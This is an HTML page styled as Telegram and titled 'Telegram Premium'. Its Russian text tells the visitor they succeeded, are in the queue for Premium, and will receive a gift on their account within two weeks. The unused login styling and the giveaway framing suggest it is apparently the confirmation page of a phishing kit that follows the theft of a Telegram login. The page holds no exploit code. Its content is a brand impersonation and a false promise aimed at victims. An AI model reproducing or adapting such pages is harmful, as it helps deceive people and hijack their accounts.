<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/style.css">
    <title>Telegram Premium</title>
    <link rel="icon" type="image/png" href="https://i.ibb.co/py8q3zd/logo.png" />
</head>
<body>
    <section class="auth">


        <article class="login_text">
            <img src="https://www.svgrepo.com/show/13650/success.svg" width="100px">
            <p class="success">Успешно!</p>
        </article>
        


        <article class="under_text">
            <p class="title_u">Вы в очереди на получение Premium !<br>
            <p class="descr_u">На ваш аккаунт будет выдан подарок в течении двух недель.</p>
        </article>



    </section>

    <style type="text/css">
        @import url("https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;1,100;1,300;1,400;1,500&display=swap");
 
         body {
         padding: 0;
         margin: 0;
         font-family: "Roboto", sans-serif;
         background: url(https://c0.lestechnophiles.com/www.numerama.com/wp-content/uploads/2022/06/telegram.jpg);
         background-repeat: no-repeat;
         background-size: cover;
         height: 100vh;
         background-position: center;
         }
 
         .success {
         font-weight: bold;
         font-size: 30px;
         padding: 0;
         margin-top: 20px;
         color: #25ae88;
         }
 
         .auth_window {
         display: flex;
         justify-content: center;
         align-items: center;
         }
 
         .auth {
         position: absolute;
         transform: translate(-50%, -50%);
         left: 50%;
         top: 50%;
         width: 500px;
         height: 400px;
         background-color: white;
         display: flex;
         flex-direction: column;
         justify-content: center;
         border-radius: 10px;
         box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
         }
 
         .auth_with {
         position: absolute;
         transform: translate(-50%, -50%);
         left: 50%;
         top: 50%;
         width: 500px;
         height: 150px;
         background-color: white;
         display: flex;
         flex-direction: column;
         justify-content: center;
         border-radius: 10px;
         box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
         }
 
         .auth_tg_to {
         display: flex;
         flex-direction: row;
         justify-content: center;
         align-items: center;
         margin-top: 15px;
         }
 
         .tg {
         width: 50px;
         height: 50px;
         background: url('data:image/svg+xml,%3Csvg height="50" viewBox="0 0 50 50" width="50" xmlns="http://www.w3.org/2000/svg"%3E%3Cg fill="none" fill-rule="evenodd"%3E%3Ccircle cx="25" cy="25" fill="%234ca3e2" r="25"/%3E%3Cpath d="m11.1838302 25.1315363c7.1532767-2.9934727 11.9232482-4.9669531 14.3099145-5.9204412 6.8144173-2.7224024 8.2303949-3.1953128 9.1533092-3.2109286.2029865-.0034345.6568489.0448847.950842.2740174.2482419.1934752.3165432.4548327.3492276.6382684.0326843.1834358.0733842.601307.0410309.9278195-.3692757 3.7267611-1.9671255 12.7706276-2.7800209 16.944664-.3439665 1.7661912-1.026197 2.1442046-1.6818831 2.2021587-1.4249578.1259476-2.5020563-.6903349-3.8821976-1.5593016-2.1596487-1.3597614-3.7791851-2.1170303-5.8754981-3.4439062-2.4226524-1.5334347-.2908188-2.3906915 1.0898437-3.7680664.361326-.3604656 6.7509766-6.1621094 6.8215001-6.027668.0306372.0584048-.192813-.6844486-.3362893-.8069372-.1434762-.1224887-.3552347-.0806023-.5080456-.0472897-.2166048.0472195-3.6666715 2.2375171-10.3502001 6.5708928-.97929.6458958-1.8663004.9605979-2.6610313.9441063-.876127-.0181806-2.561444-.4758095-3.814304-.8669794-1.5366837-.4797857-2.10392683-.7057418-1.9975768-1.5205665.0553937-.4244111.4458533-.8676919 1.1713788-1.3298423z" fill="%23fff"/%3E%3C/g%3E%3C/svg%3E')
             no-repeat 0 0;
         }
 
         .auth_to {
         width: 50px;
         height: 50px;
         margin-left: 60px;
         display: flex;
         justify-content: center;
         align-items: center;
         }
 
         .login_text {
         font-weight: bold;
         text-align: center;
         color: #363b40;
         font-size: 18px;
         }
 
         .login_link {
         text-decoration: none;
         color: #1385d8;
         font-weight: bold;
         }
 
         .under_link {
         text-decoration: none;
         color: #1385d8;
         }
 
         .under_text {
         text-align: center;
         color: #363b40;
         }
 
         .title_u {
         font-weight: bold;
         font-size: 20px;
         margin: 0;
         }
 
         .descr_u {
         font-size: 15px;
         margin-top: 5px;
         }
 
         .under_text p {
         margin-bottom: 0;
         }
 
         .title {
         color: #363b40;
         }
 
         .with {
         display: flex;
         flex-direction: column;
         align-items: center;
         }
 
         @media screen and (max-width: 600px) {
         .auth {
             position: absolute;
             transform: translate(-50%, -50%);
             left: 50%;
             top: 25%;
             width: 370px;
             height: 400px;
             background-color: white;
             display: flex;
             flex-direction: column;
             justify-content: center;
             border-radius: 10px;
             box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
         }
         }
 
     </style>
</body>
</html>